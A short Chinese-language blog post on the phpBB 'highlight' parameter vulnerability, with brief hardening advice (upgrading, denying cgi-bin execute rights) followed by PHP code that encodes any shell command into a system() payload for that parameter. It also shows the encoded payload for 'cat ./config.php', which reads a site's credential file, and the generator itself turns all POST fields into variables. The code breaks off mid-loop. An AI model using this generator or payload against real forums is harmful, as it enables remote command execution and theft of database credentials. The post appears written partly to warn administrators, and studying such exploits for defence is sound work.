X
    Categories: Program

crack 解析

最近光這個 Error URL 就不知道看過多少..
看了這個後還是要警惕自己.. 系統安全還是要小小維護一下...
最主要 要注意的是 MT 的 archives 不能給 cgi-bin 執行的權限..
這樣子就可以安心了~~ 🙂
原來這是 phpBB 的漏洞
升級後問題回報


產生轉換程式
<?php
while ( list($key,$val)=each($_POST)) {
echo "$key=$val
";
$$key=$val;
}
echo "<html><body><form method=POST action=./url.php><input type=text name=cmd value=\"\"><input type=submit name=smt1 value=\"轉換\"></form></body></html>\n";
if (isset($smt1)) {
echo "你輸入的 Cmd:$cmd<BR>\n";
$cmd_code=phpbb_code($cmd);
echo "&highlight=".$cmd_code."<BR>";
}
透過上面,你將 "cat ./config.php" 轉出來會為:
&highlight=%2527%252esystem(chr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(46)%252echr(47)%252echr(99)%252echr(111)%252echr(110)%252echr(102)%252echr(105)%252echr(103)%252echr(46)%252echr(112)%252echr(104)%252echr(112))%252e%2527
function phpbb_code($cmd)
{
$str="%2527%252esystem(";
$chars = preg_split('//', $cmd, -1, PREG_SPLIT_NO_EMPTY);
$cnt=count($chars)-1;
for($i=0;$i

Tsung: 對新奇的事物都很有興趣, 喜歡簡單的東西, 過簡單的生活.
Related Post